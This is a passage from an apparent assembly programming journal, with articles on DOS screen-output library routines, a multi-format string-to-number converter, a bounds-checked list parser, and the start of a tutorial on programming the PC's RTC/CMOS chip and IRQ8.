mov ah,08 ;; @Receive character without echoing to screen
int 21h
cmp al, TAB_KEY ;; Check whether TAB key has pressed
je _left
cmp al,ENTER_KEY ;; Check whether ENTER key has pressed.
je _end_proc ;; Exit program
cmp al,00 ;; @Check whether any Extended Key has pressed.
jne mouse_check
mov ah,08
int 21h
cmp al, LEFT_ARROW ;; Check whether LEFT ARROW key has pressed
je _left
cmp al, RIGHT_ARROW ;; Check whether RIGHT ARROW key has pressed
je _right
jmp mouse_check
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;
_left:
cmp button,'y'
je _no
jmp _yes
_right:
cmp button,'y'
je _no
jmp _yes
;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_end_proc:
@Cursor right_x+1, 0 ;; Move cursor below the dialog box
mov ax,02 ;; Hide mouse cursor
int 33h
RET
Dialog_box ENDP ;; End of procedure
END ;; End of program
;;////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\;;
Now, we have written a superb user friendly program. If you want to embed
the
above examples in your work, you may have to heavily change these programs,
but the basic principles will be the same.
Please, e-mail me your comments and suggestions at
ssirajudeen@...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
ASM Building
Blocks
by Laura
Fairhead
Here are some simple but very powerful library routines, primarily
concerned with screen output. They all follow the same conventions:
* Routines preserve all registers that they are not specified to return.
* The direction flag (DF) should always be clear before calling.
All code is presented in MASM format. I do not use very many of the
functions of this assembler so it should be trivial to assemble these under
a different one. I do, however, use OPTION SCOPED, this means that labels
within a PROC block are local to that PROC block (a double colon suffixed
label is given global scope though).
First come the primitive routines. These are responsible for the actual
output and simply call DOS to do it. The name for this sort of thing is
called a 'wrapper' function. It does nothing in itself except afford a
particular interface to an application. If all your access to the OS is in
a small number of logical wrapper functions then porting your code to other
systems becomes a lot easier.
;pstrcx- write CX characters to stdout
; uses DOS function 040h
;
;entry: DS:SI=string address
; CX=length of string
;
;exit: (no parameters are returned)
pstrcx PROC NEAR
;assume that DOS can't handle a zero-byte write
;(I don't trust those M$ programmers)
JCXZ don
PUSH AX
PUSH BX
MOV AH,040h
MOV BX,1 ;stdout is handle #1
XCHG DX,SI
INT 021h
XCHG DX,SI
POP BX
POP AX
don: RET
pstrcx ENDP
Note the use of XCHG. XCHG is an extremely useful instruction indeed,
even though there are those who wish to see it's death along with all
those other "horrible, odd-ball, x86 specific". XCHG in essence performs
two operations simultaneously, which is hideously useful considering
they are both MOV's, also if one of the registers is AX (or EAX in 32-bit
code) you get a lovely 1 byte instruction bonus.
XCHG is in fact the real instruction hiding behind the psuedo-op NOP.
If you look at the opcode for a NOP, it is 090h, this is actually the
encoding for XCHG AX,AX, which since it has no effect on the machine state
whatsoever (except of course IP+=1) is ideally suited for this.
I haven't looked back since adding putch to my library. I used to use
the sequence:-
MOV DL,<char>; MOV AH,2; INT 021h
Not only is the putch method much cleaner and more flexible it is
also saving bytes! Of course the pay-back is that this method adds clocks.
However if you think about it the wasted clocks are meaningless really.
Sending characters one at a time to stdout is rather like spelling out
a dictate to your secretary letter-by-letter. In a case where you want
more MIPS you should be looking at your higher level algorithm and not
the output routine, an INT takes a vast amount of time anyway...
;putch- write single character to stdout
; uses DOS function 02h
;
;entry: AL=character to write
;
;exit: (no parameters are returned)
putch PROC NEAR
PUSH DX
XCHG DX,AX
MOV AH,2
INT 021h
XCHG DX,AX
POP DX
RET
putch ENDP
Not hot on speed this strlen, it was written to be compact. You can
if you wish write MUCH faster code than this. I believe X-Bios2 presented
something along these lines in a previous APJ. However, the most important
thing here is certainly not speed, and again if you wanted speed on string
handling so badly, you should really not use asciiz at all; it was never
designed for that.
;strlen- return length of asciiz string
;
;entry: DS:SI=address of asciiz string
;
;exit: CX=length of string
strlen PROC NEAR
PUSH AX
XOR CX,CX
DEC CX
lop: INC CX
LODSB
CMP AL,1
JNC lop
SBB SI,CX
POP AX
RET
strlen ENDP
Now, already, we start getting serious payback for being so good.
The code virtually writes itself.....
;pstr- write asciiz string to stdout
;
;entry: DS:SI=address of asciiz string
;
;exit: (no parameters are returned)
pstr PROC NEAR
PUSH CX
CALL NEAR PTR strlen
CALL NEAR PTR pstrcx
POP CX
RET
pstr ENDP
;pstrcr- write asciiz string to stdout with appended newline
;
;entry: DS:SI=address of asciiz string
;
;exit: (no parameters are returned)
pstrcr PROC NEAR
CALL NEAR PTR pstr
JMP NEAR PTR outcr
pstrcr ENDP
;outcr- write newline to stdout
;
;entry: (no entry parameters)
;
;exit: (no parameters are returned)
outcr PROC NEAR
PUSH AX
MOV AL,0Dh;CALL NEAR PTR putch
MOV AL,0Ah;CALL NEAR PTR putch
POP AX
RET
outcr ENDP
;pchn- write repeated character to stdout
;
;entry: AL=character
; CX=repetitions (0 is valid and does nothing)
;
;exit: (no parameters are returned)
pchn PROC NEAR
JCXZ don
PUSH CX
lop: CALL NEAR PTR putch
LOOP lop
POP CX
don: RET
pchn ENDP
;pstrlcl- output string DS:SI left justified in a field
; of CL spaces
;
; if the field width is smaller than the string length
; then the string is simply output
;
;entry: DS:SI=asciiz string
; CL=field width
;
;exit: (all registers preserved)
pstrlcl PROC NEAR
PUSH AX
PUSH CX
CALL NEAR PTR pstr
MOV CH,0
XCHG CX,AX
CALL NEAR PTR strlen
SUB AX,CX
JNA SHORT don
XCHG CX,AX
MOV AL,020h
CALL NEAR PTR pchn
don: POP CX
POP AX
RET
pstrlcl ENDP
Note the use of JNA. If you look at the logic for the JNA branch
(not many people seem to do this) you find that it branches iff
CF=1 OR ZF=1, hence after the SUB if the result goes <=0
You may notice that all the routine names are <= 8 chars. The reason
for this being that you can save each one as a seperate file, giving it
the name of the routine. This allows easy reference but has a drawback
or two:
(i) you have to remember the dependencies when you INCLUDE them
(ii) you end up with a LOT of files
So far I haven't found either of these 'drawbacks' to be a serious
problem.
I will be referring back to routines a lot in future articles; whenever
routines are required I will state it and the code shall have a list of
INCLUDE's for the routines to be included. In this manner it will be
possible
to present quite untrivial programs within a reasonable amount of space.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Converting Strings to
Numbers
by Chris Dragan
Many programs require user input, which is often numbers. For this
purpose
there are library functions, like for example sscanf() in C. But in assembly
all has to be done by hand, even under Windows (with the exception of edit
controls - GetDlgItemInt() function).
My last project required a flexible function for reading numbers stored
as
strings. From this project I carried out a great function which handles most
of common number formats.
The function expects esi register to point at a string, which is a
number.
The string can have one of the following forms:
10 decimal integer
10D decimal integer
1010B binary integer
AH hexadecimal integer (does not require leading zero)
0XA hexadecimal integer
$A hexadecimal integer
12Q octal integer
12O octal integer
10F float
10.0 float
10.0F float
1.0E+1F float
1.E+1 float
The string is required to have all letters (hex digits, number type
specifiers) uppercase. If a number is to contain lowercase letters, it has
to be converted before calling the function.
The function returns in eax number type:
- 0 if the number is invalid,
- 1 if the number is a dword integer,
- 2 if the number is a qword integer and
- 3 if the number is a float.
The number is returned in edx (dword), ecx:edx (qword) or st(0) (float).
The number will be a qword integer if it exceedes 0xFFFFFFFF boundary.
Also notice that the number is assumed to be positive, '-' before the
number is not accepted and has to be handled externally.
Floating point conversion is done using multiplication, not by means
of fbld instruction. This is because fbld instruction limits numbers to
19 characters, but the function can accept longer numbers if only they
are not too large/small.
And here is the function. It was written (and tested) in TASM's ideal
mode,
but it can be easily ported to MASM or NASM. The function preserves all
registers but eax, ecx and edx, which are used for return value.
; This helper macro checks if there was an error on the fpu
macro chkfpu _endinglabel
fxam
fstsw ax
sahf
jc _endinglabel
endm
proc ConvertNumber uses edi
;---------------- Identify number format
; Search for 0 at the end
mov edi, esi
or ecx, -1
xor eax, eax
cld
repne scasb
; Move to the last character
dec edi
dec edi
; Is there anything ?
cmp esi, edi
ja __invalid
; Identify C-style and Pascal-style hexadecimals
cmp [byte esi+1], 'X'
je __c_hex
cmp [byte esi], '$'
je __pas_hex
; Identify other types using the last character
movzx eax, [byte edi]
cmp eax, 'H'
je __asm_hex
cmp eax, 'B'
je __binary
cmp eax, 'D'
je __decimal
cmp eax, 'Q'
je __octal
cmp eax, 'O'
je __octal
cmp eax, 'F'
je __float_clr
; Find a comma (distinguish between integer and float)
not ecx
dec ecx
mov eax, '.'
mov edi, esi
repne scasb
je __float
;---------------- Process decimal integer
; Prepare
__decimal: mov [byte edi], 0
mov edi, esi
xor eax, eax
; Get a digit
__next_decimal: movzx ecx, [byte edi]
inc edi
xor edx, edx
; Zero ends the string
test ecx, ecx
jz __finito
; Multiply the already loaded part by ten
add edx, 10
mul edx
; If an overflow occurs - the number is a quadword
jo __decimal_qword
; Check digit validity
sub ecx, '0'
jc __invalid
cmp ecx, 9
ja __invalid
; Add the digit
add eax, ecx
; Next digit or process a quadword if carry occurs
jnc __next_decimal
jmp __decimal_carry
;---------------- Decimal (appears to be greater than 0FFFF_FFFFh)
; Check digit validity
__decimal_qword: sub ecx, '0'
jc __invalid
cmp ecx, 9
ja __invalid
; Add the digit (qword addition)
add eax, ecx
__decimal_carry: adc edx, 0
; Load next digit
movzx ecx, [byte edi]
inc edi
; Check for ending zero
test ecx, ecx
jz __finito
; Multiply high part by 10
push eax
mov eax, edx
mov edx, 10
mul edx
; Number too large if an overflow occurs
jo __decimal_overflow
; Multiply low part by 10
xchg eax, [esp]
mov edx, 10
mul edx
; Join high parts
add edx, [esp]
; Number too large if carry
jc __decimal_overflow
; Next digit
add esp, 4
jmp __decimal_qword
; Handle overflow
__decimal_overflow: pop eax
jmp __invalid
;---------------- Process hexadecimal integer
; Was Pascal-style hex (leading '$')
__pas_hex: lea edi, [esi+1]
jmp __hex
; Was C-style hex (leading '0X')
__c_hex: cmp [byte esi], '0'
jne __invalid
lea edi, [esi+2]
jmp __hex
; Was asm-style hex (ending with 'H')
__asm_hex: mov [byte edi], 0
mov edi, esi
; Clear what will become the number
__hex: xor eax, eax
xor edx, edx
; Get a digit
__get_hex: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __finito
; Number too large if the most significant nibble of edx
; is nonzero
cmp edx, 0FFFFFFFh
ja __invalid
; Multiply the already converted part by 16
shld edx, eax, 4
add eax, eax ; to avoid shift (see lea below)
; Convert ASCII to digit
sub ecx, '0'
jc __invalid
cmp ecx, 9
jna __hex_ok
sub ecx, 7
cmp ecx, 9
jna __invalid
cmp ecx, 15
ja __invalid
; Add the digit
__hex_ok: lea eax, [eax*8+ecx]
jmp __get_hex
;---------------- Return integer
__finito: mov ecx, edx
mov edx, eax
cmp ecx, 1
sbb eax, eax
add eax, 2
ret
;---------------- Process binary integer
; Prepare
__binary: mov [byte edi], 0
xor eax, eax
xor edx, edx
mov edi, esi
; Get a digit
__get_binary: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __finito
; Shift everything left and add the digit
shr ecx, 1
adc eax, eax
adc edx, edx
jc __invalid
; Check digit validity and get next digit if OK
cmp ecx, '0' shr 1
jne __invalid
jmp __get_binary
;---------------- Process octal integer
; Prepare
__octal: mov [byte edi], 0
xor eax, eax
xor edx, edx
mov edi, esi
; Get a digit
__get_octal: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __finito
; Check if there is a room for another digit
cmp edx, 1FFFFFFFh
ja __invalid
; Multiply the already converted part by 8
shld edx, eax, 3
; Convert ASCII to number
sub ecx, '0'
jc __invalid
cmp ecx, 7
ja __invalid
; Add the digit
lea eax, [eax*8+ecx]
jmp __get_octal
;---------------- Invalid number
__invalid: fninit
xor eax, eax
ret
;---------------- Process integer part of a float
; Prepare (st0=0, st1=10)
__float_clr: mov [byte edi], 0
__float: finit
push 0300h ; mask off all interrupts
fldcw [word esp]
push 10
fild [dword esp]
add esp, 8
fldz
mov edi, esi
; Get a digit
__get_integer: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __float_ready
; Comma starts fraction part
cmp ecx, '.'
je __float_fraction
; Multiply the already converted part by 10
fmul st, st(1)
chkfpu __invalid
; Convert ASCII to number
sub ecx, '0'
jc __invalid
cmp ecx, 9
ja __invalid
; Add the digit
push ecx
fiadd [dword esp]
add esp, 4
chkfpu __invalid
jmp __get_integer
;---------------- Process fractional part of a float
; Prepare (st0=0, st1=1, st2=num, st3=10)
__float_fraction: fld1
fldz
; Get a digit
__get_fraction: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __fraction_ready
; E starts exponent
cmp ecx, 'E'
je __fraction_ready
; Multiply the already converted part by 10
fmul st, st(3)
; Multiply the divisor by 10
fxch st(1)
fmul st, st(3)
fxch st(1)
chkfpu __invalid
fxch st(1)
chkfpu __invalid
fxch st(1)
; Convert ASCII to number
sub ecx, '0'
jc __invalid
cmp ecx, 9
ja __invalid
; Add the digit
push ecx
fiadd [dword esp]
add esp, 4
chkfpu __invalid
jmp __get_fraction
;---------------- Process exponent part of a float
; Divide the fraction by the divisor
__fraction_ready: fdivrp st(1), st
; Add fraction to integer
faddp st(1), st
; E indicates start of exponent
cmp ecx, 'E'
jne __float_ready
; Prepare (st0=0, st1=num, st2=10)
fldz
; Sign of the exponent
xor edx, edx
cmp [byte edi], '-'
jne __no_minus
not edx
inc edi
__no_minus: cmp [byte edi], '+'
jne __get_exponent
inc edi
; Get a digit
__get_exponent: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __exponent_ready
; Multiply the already converted part by 10
fmul st, st(2)
chkfpu __invalid
; Convert ASCII to number
sub ecx, '0'
jc __invalid
cmp ecx, 9
ja __invalid
; Add the digit
push ecx
fiadd [dword esp]
add esp, 4
chkfpu __invalid
jmp __get_exponent
; Multiply by 10**exp (** is a power operation)
__exponent_ready: test edx, edx
jz __positive_exp
fchs
__positive_exp: fldl2t;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿10**x = 2**(x*log2(10))
fmulp st(1), st ;³
fld st ;³
frndint ;³
fsub st(1), st ;³
fld1 ;³
fscale ;³
fstp st(1) ;³
fxch st(1) ;³
f2xm1 ;³
fld1 ;³
faddp st(1), st ;³
fmulp st(1), st;ÄÄÄÄÄÄÄÙ
fmulp st(1), st
; Return float
__float_ready: chkfpu __invalid
fstp st(1)
mov eax, 3
ret
endp
And that is it. The function is not meant to work as fast possible and was
not optimized, but it does the task it has to do.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
List Scan Library
Routine
by Laura Fairhead
Firstly let me introduce an auxillary routine this uses. It is
called 'scaws' and scans past white space. It is very simple, and the
definition of whitespace here is SPACE (020h) or TAB (09h):-
========START OF CODE======================================================
;
;scaws- scan whitespace
;
;entry: DS:SI=string
; DF=0
;
;exit: SI=updated to first non-whitespace character
; AL=value of the character
;
scaws PROC NEAR
;
;there is nothing to explain here but you might take note now
;that I always use the same label names in different PROC blocks,
;in MASM you can do this with OPTION SCOPED
;
lop: LODSB
CMP AL,020h
JZ lop
CMP AL,09h
JZ lop
DEC SI
RET
scaws ENDP
========END OF CODE========================================================
'scalst' is basically a routine to scan-convert a list which can
consist of values and strings. The radix of the values must be set
before hand by calling 'scanur' as the routine uses 'scanu' to convert
values and doesn't set the radix itself. The syntax of the list is
almost the same as the list in DEBUG, where in fact I got the idea from.
You have from 0+ data items, optionally seperated by commas. Whitespace
can be used freely as a delimitor and no delimitors are necessary where
there is no need for them (eg: between a value and a string).
The routine takes several parameters, the address of your string
(DS:SI), the address of somewhere to store the converted data (ES:DI),
the size of the data store (CX) and the size of a unit (AL). The unit size
can be byte (AL=1), word (AL=2), dword (AL=4).
Each data item, as in value/string character, is zero-padded to the
unit size for storing. Also values are checked that they are in range for
the unit size. This method therefore allows us to have those silly
word strings.
Here are some examples, all of these assume that we had set the
radix = 010h (by calling 'scanur' with AL=010h) :-
Calling with AL=1, and our string=1 2 3 "ABC" yields:-
01 02 03 41 42 43
Calling with AL=4, and our string="0"1FE08 2 yields:-
30 00 00 00 08 FE 01 00 02 00 00 00
Calling with AL=2, and our string=9A06 87"DEF" yields:-
06 9A 87 00 44 00 45 00 46 00
Calling with AL=2, and our string="ABC"FE0FE 0 1 2 yields:-
ERROR! CF=1 (FE0FE>FFFF)
A particularly powerful feature of this routine is that it takes
a parameter giving the size of your data store (in bytes). This means
that it will be impossible for the program to be crashed because there
was too much data. Programmers are generally too lazy to do this sort of
range checking, and much to their woe as one particularly wily hacker
attack called 'crashing the stack' has taught.
Example; if we called with AL=2, CX=4 and string=1 9 F
ERROR! CF=1 (01 00 09 00 0F 00 > 4bytes)
As an aside, the function is not entirely the same as DEBUG's list
scanner. With DEBUG the strings are always converted to byte lists, no
matter what the unit size is. It is trivial to modify the routine to
work in this way.
One last note is that the end of the list is the first invalid
character in the string, this not being an error of course since it is
the responsibilty of the controlling parser to decide this based on the
context; eg: DEBUG might check for a semicolon comment on the end of
the line, though as a matter of fact it doesn't. A premature ending (ie:
0 byte appearing inside the quotes of a string token) will abort with
error, thus;
AL=1, string=0A 98"unterminated string yields:-
ERROR! CF=1 (unterminated string)
========START OF CODE======================================================
;
;scalst- data list scan/convert routine
;
;entry: DS:SI=string
; ES:DI=store
; CX=#bytes size of store
; AL=unit size (1=byte,2=word,4=dword)
; DF=0
;
; "scanur" must have been called at least once previously
; in order to set the radix of scanned values
;
; !! entry parameters are not validated and invalid entry
; !! parameters will cause undefined behaviour
;
;exit: CF=1=>error (parse/overflow)
; CF=0=>okay, then:
; ZF=1=>no data scanned, ie: CX=0
; ZF=0=>data scanned
; SI=updated to the first invalid character
; DI=updated to the end of converted data + 1
; CX=#bytes converted data (invalid on overflow error)
;
;note: requires routines "scaws" and "scanu"
;
scalst PROC NEAR
;
;initialise stack frame
;[BP-4] (dw) size mask
; =000000FFh for unit size 1
; =0000FFFFh for unit size 2
; =FFFFFFFFh for unit size 4
;[BP-6] (w) unit size
;[BP-8] (w) original data offset DI
;
;EAX is preserved and the main loop is entered
;
ENTER 8,0
PUSH EAX
CBW
MOV [BP-6],AX
NEG AL
AND AL,3
SHL AL,3
PUSH CX
XCHG CX,AX
OR EAX,-1
SHR EAX,CL
POP CX
MOV [BP-4],EAX
MOV [BP-8],DI
JMP SHORT inlop
;
;main loop head
; ignore any whitespace and skip the optional comma
;
lop: CALL NEAR PTR scaws
CMP BYTE PTR [SI],','
JNZ SHORT ko
INC SI
;
;main loop entry
; ignore any whitespace and if a value token is recognised
; write it to data store and continue loop
;
inlop: CALL NEAR PTR scaws
ko: CALL NEAR PTR scanu
JC SHORT don
JZ SHORT ko2
;
; check that the value is in range for the unit size, if not
; abort here with an error
;
CMP [BP-4],EAX
JC SHORT don
CALL NEAR PTR wracc
JMP lop
;
; no value was present so check for a string
;
ko2: CMP BYTE PTR [SI],022h
CLC
JNZ SHORT don
;
; get string into data store
;
INC SI
XOR EAX,EAX
lop1: MOV AL,[SI]
;
; unterminated string causes an error abort, LODSB is not used for the
;load in order to ensure that [SI] will point to the invalid character
;
CMP AL,1
JC SHORT don
INC SI
CMP AL,022h
JZ lop
CALL NEAR PTR wracc
JMP lop1
;
; exit point for 'wracc' routine below, clean-up the stack
;
err0: POP EAX
;
; main exit point. the carry flag is preserved as this is used
; for both error and normal exits. the number of bytes stored
; is calculated into CX, the INC/DEC ensuring ZF=1 if this was zero
;
don: LAHF
MOV CX,DI
SUB CX,[BP-8]
SAHF
INC CX
DEC CX
;
; restore the only corrupted register and 'LEAVE'
;
POP EAX
LEAVE
RET
;
;wracc- write datum in accumalator to data store
; AL/AX/EAX is written to the data store depending on the unit size.
; throughout the routine DI is the offset into the data store and
; CX is the #bytes left in it. these are updated but if there are
; insufficient bytes remaining in the store we abort with error, taking
; care to clear the 4 bytes (AX + return address) off the stack first
;
wracc: PUSH AX
MOV AX,[BP-6]
SUB CX,AX
JC err0
CMP AL,2
POP AX
JZ SHORT ko0
JNS SHORT ko1
STOSB
RET
;
; note that 066h STOSW = STOSD
;
ko1: DB 066h
ko0: STOSW
RET
scalst ENDP
========END OF CODE========================================================
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Using the RTC
by Jan
Verhoeven
Here are some routines to use the RTC/CMOS chip for serious timing. It's
an introductory tutorial, so you'll be given more than enough opportunity to
experiment with timing via this method.
About the hardware.
===================
The RTC chip used to be a Motorola MC 146818A chip, but nowadays you
will either find a Dallas 1287 or 1387 style chip, or it is embedded in
the chipset. So far for romance... :o)
I will describe the Dallas DS 1287 since this is the configuration which
is most common for many years now, and the majority of the features are
the same as for the other chips.
The DS 1287 is a clock/RAM with a Lithium battery inside the package.
That's why it stays so big: the battery needs space. If the system is
powered on, the RTC gets its power from the powersupply. When the PC is
off, the RTC goes into power-down mode and slowly drains the Lithium
cell. Expected life for the battery is around 10 years.
The DS 1287 has 64 storage locations, 14 of which are clock and control
registers and the remaining 50 are battery-backed general purpose RAM
cells. This is were the CMOS setup of your PC stores it's system setup
data.
The programmable clock can issue an interrupt, which can be triggered by
three independent events: time of day, periodic signal or end of clock-
update.
The 14 registers inside the DS 1287 are:
address purpose
------- ---------------------------------------
0 current value of seconds
1 alarm setting for seconds
2 current value of minutes
3 alarm setting for minutes
4 current value of hours
5 alarm setting for hours
6 Day of the week [Sunday = 1]
7 Day of the month
8 month [0..12]
9 year of this century [0..99]
10 Control register A
11 Control register B
12 Control register C [read-only]
13 Control register D [read-only]
If you want to know the time of day, or any other date related data,
just select the RTC chip and request the contents of the desired
register.
The alarm registers can be set to generate long-time periodical
interrupts, or for having the chip give a signal when it's time for your
nap. The alarm rate ranges from seconds to weeks.
And since these alarm registers are almost never used, they can also be
used for storing some data for your own software. PTS Partition Manager
for example uses these registers to keep track of where it was, while
reformatting the hard disk. If there is a power-fail, it will just
continue where it left off.
In the PC, the RTC chip is hidden from the programmer. It can only be
accessed in an indirect way. The trick is to first select a register
location and then access that one register as follows:
mov al, <register number>
out 70h, al ; select <register number>
in al, 71h ; for a READ operation
out 71h, ah ; for a WRITE operation
So, we use port 70h for selecting a register or storage location and use
port 71h for doing the actual access to that register. A bit tedious,
but that's how the PC was designed in the first place.
In "old style" RTC chips the century is maintained in software. It
resides in a RAM cell, offset 32h/50d, so it will not be affected by a
year-rollover from 99 to 00. If you update it with a short piece of code
on January first 2000, your PC will be ready for many, many, moons to
come.
The control registers.
======================
Registers A, B, C and D are the registers that control the working of
the RTC clock. They have various functions and register D uses just a
singe bit, which is also read-only....
But this chip is well engineered and all registers have a significant
(although not always logical) influence on the operation of it.
Register A: Timing control.
---------------------------
Register A is layed out as follows:
bit function
--- ------------------------------------------------------------
7 UIP bit: Update In Progress. When there's a ONE in this flag
the timing registers are being updated and it is not safe to
read them. Better to wait until this flag is cleared.
This one bit is read-only!
4-6 DV0-DV2: these three bits control the on-chip oscillator. Do
not experiment too much with this setting. There is only ONE
valid combination for these three bits: 010.
0-3 RS0 - RS3: These are the four Rate Selector bits. They
determine how often the IRQ pin is activated. The following
table shows the meaning of the different values.
RS3 RS2 RS1 RS0 Frequency [Hz] Period [ms]
--- --- --- --- -------------- -----------
0 0 0 0 --- ----
0 0 0 1 256 3.906
0 0 1 0 128 7.813
0 0 1 1 8192 0.122
0 1 0 0 4096 0.244
0 1 0 1 2048 0.488
0 1 1 0 1024 0.977
0 1 1 1 512 1.953
1 0 0 0 256 3.906
1 0 0 1 128 7.813
1 0 1 0 64 15.625
1 0 1 1 32 31.25
1 1 0 0 16 62.5
1 1 0 1 8 125.0
1 1 1 0 4 250.0
1 1 1 1 2 500.0
The default value in the average IBM PC is 0110 or 1024 Hz.
Since no IRQ is enabled, you will not notice any difference
if you change the value.
Register B: Internal operation control.
---------------------------------------
This is the most important register for controling operation of the RTC
chip. Register A determines timing and oscillator parameters, but the B-
register determines how the system will notice these conditions.
In a normal PC, only bit 1 (24/12) is set. All other bits are cleared.
bit function
--- ------------------------------------------------------------
7 SET : If you determine to write a ONE in this bit position,
the clockregisters will not be updated anymore. Only when
this bit is ZERO, the clockregisters will be updated.
6 PIE : The Periodic Interrupt Enable bit controls the IRQ
pin. If this bit is ZERO, no IRQ will be given when the
programmable frequency source (selected by RS0 - RS3) times
out.
You need to set this bit to a ONE to enable a periodic IRQ
operation.
5 AIE : Alarm Interrupt Enable. When this bit is ONE, the IRQ
pin is activated when the alarm-time equals the actual time.
4 UIE : "Update Ended" Interrupt Enable. When this bit is set
to ONE, the IRQ line is asserted when the timing registers
have changed contents.
3 SQWE : Put a ONE in this bit to have the programmable
interval timer (which is controlled by RS0 - RS3) output a
square wave on pin 23 of the chip.
Unfortunately this pin 23 is not connected in a PC so for us
this bit has no meaning. But if you are man enough to bring
pin 23 of the DS 1287 to the outside world, you can use it
at will.
2 DM : Data Mode. The timing registers can display their data
in two different modes: binary and BCD. In the PC, this bit
is always ZERO, meaning that BCD is the desired format.
1 24/12 : Controls if hours are shown in 12 or 24 hours mode.
Put a ONE inhere and you have 24 hours in a day. Clear this
bit and you end up with two half days of 12 hours each. In
the 12-hour mode, bit 7 acts as an AM or PM flag.
0 DSE : Daylight Saving Enabled. Always leave this bit cleared
to ZERO. Daylight saving time periods vary worldwide and the
dates of change are determined by politicians and not by
chipmakers. Unfortunately.
Register C: Interrupt sources.
------------------------------
Register C is a status-word only. The bits in this register are read-
only and only have menaing AFTER an IRQ was received.
Since there is just one IRQ pin on the RTC chip, the IRQ can have three
different sources and there's no way to know which one triggered it,
unless there was only one source enabled. The bits mean the following:
bit function
--- ------------------------------------------------------------
7 IRQF : If this bit is ONE, one of the actual interrupt
conditions was enabled and the interrupt condition was met.
6 PF : Periodic interrupt Flag. If this bit is set, the source
of this IRQ source was the programmable interval timer.
5 AF : Alarm interrupt Flag. If this bit is set, the alarm
condition was the same as the actual date/time.
4 UF : The "Update Ended" interrupt Flag. If this bit is set,
the IRQ was issued by an update of the timing registers.
Bits 0 - 3 are meaningless and will always be ZERO.
Register D: Battery status.
---------------------------
On the chip, there is a voltage reference that is constantly being
compared to the battery voltage. If the battery voltage drops below the
reference voltage, the battery is considered empty and bit 7 will be
SET.
If bit 7 is a ONE, the battery has been empty for some period of time
and hence the data in the timing registers and in the RAM locations MAY
have lost their meaning.
Bits 0 - 6 have no meaning in this register and will always return a
ZERO value.
Using the RTC internals.
========================
This, in a nutshell, is what the RTC chip is from the inside. I already
explained some lines above how to access the storage locations and the
timing registers of the DS 1287. This does not mean that everything will
also work the first time.
If you need to change a timing value, you must always first disable
register updates, even if you make sure that the changes you make to the
timing registers will well fit in an RTC timeslot. This means:
- access register B and set the SET flag
- change the timing registers
- access register B and clear the SET flag
Remember, there's not much intelligence inside a DS 1287. More recent
chips might do more tricks for the programmer, but the old beasties just
do as they were told.
In order to set the periodic interrupt rate, we use the following code:
--- Begin ------------------------------------------- SetPIRate -----
SetPIRate: ; Set Periodic Interrupt Rate
mov al, 0A ; ah = rate to set
out 070, al
mov al, ah
out 071, al ; and set it in register A
ret
---- End -------------------------------------------- SetPIRate -----
This code is very straightforward. It relies on the fact that (in the
IBM PC) the contents of register A are always the same:
bit 7 = read-only
bits 4 - 6 = 010
bits 0 - 3 = rate selector
So, it can set the value of bits 4 - 7 in the calling code. It is not
good programming, since we should:
- read in the contents of Register A
- clear bits 0 - 3
- OR in the new value
- write it back to register A
Inside the IBM PC.
==================
The IRQ pin of the RTC is connected to the Intel 8259 PIC (Programmable
Interrupt Controller, although "programmable" is too much honour for
this dumbo). In non-XT machines there are two of them, cascaded. This
means that the second one is connected to what used to be IRQ2. This
gives us a rather stupid PC IRQ priority list:
IRQ Priority IRQ Priority
--- -------- --- --------
0 0 8 2
1 1 9 3
2 10 10 4
3 11 11 5
4 12 12 6
5 13 13 7
6 14 14 8
7 15 15 9
A lower number means a higher priority....
The RTC interrupt line is connected to PC-IRQ8. So it comes in third
place for being serviced. When enabled!
Normally IRQ8 is NOT enabled, so you will first have to settle that with
the PIC, which is far from easy to understand. I use the following code
to enable and disable the IRQ8 processing. Disabling this interrupt is
necessary after your program is unloaded from memory. If you don't do
this, the IRQ service routine vector might point to some random code or
data in the next program loaded (like Command.Com).
----------------------------------------------------- EnableIRQ8 ----
EnableIRQ8: ; enable IRQ 8 in 8259
push ax
in al, 0A1 ; get IRQ mask word
and al, not bit 0
out 0A1, al ; enable IRQ 8
pop ax
ret
----------------------------------------------------- EnableIRQ8 ----
Easy, isn't it? It took some nights to figure this out, 'cause the Intel
databooks are not that clear. I was glad to find some NEC databooks
since these shed some more light. In general, for older chips, NEC is a
good choice of databooks. They used to second source 80x86 chips for
Intel and are still known for their innovations they put into their V20
and V30 chips. The V25, a vastly improved 8088, was contaminated by 8
full banks of 14 registers. Luckily Intel did not copy this. What would
a 386 have been with 250 GP registers?
Here's the code for disabling IRQ8:
--- Begin ------------------------------------------ DisableIRQ8 ----
DisableIRQ8: ; disable IRQ 8 in 8259
push ax
in al, 0A1 ; get IRQ mask word
or al, bit 0
out 0A1, al ; disable IRQ 8
pop ax
ret
---- End ------------------------------------------- DisableIRQ8 ----
Asserting IRQ8 will make the PC generate an INT 70h. So, we need to have
an INT 70h handler ready:
--- Begin ------------------------------------------ NewIRQ8 --------
L0: mov [IrqCount], ax ; and store it
L1: mov al, 020 ; tell stupid PC that IRQ ends
here
out 020, al ; EOI to original PIC
out 0A0, al ; EOI to cascaded PIC
pop ds, ax ; restore registers
iret ; and get out
NewIRQ8: push ax, ds
cs mov ds, [DataSeg] ; restore DS
mov al, 0C
out 070, al
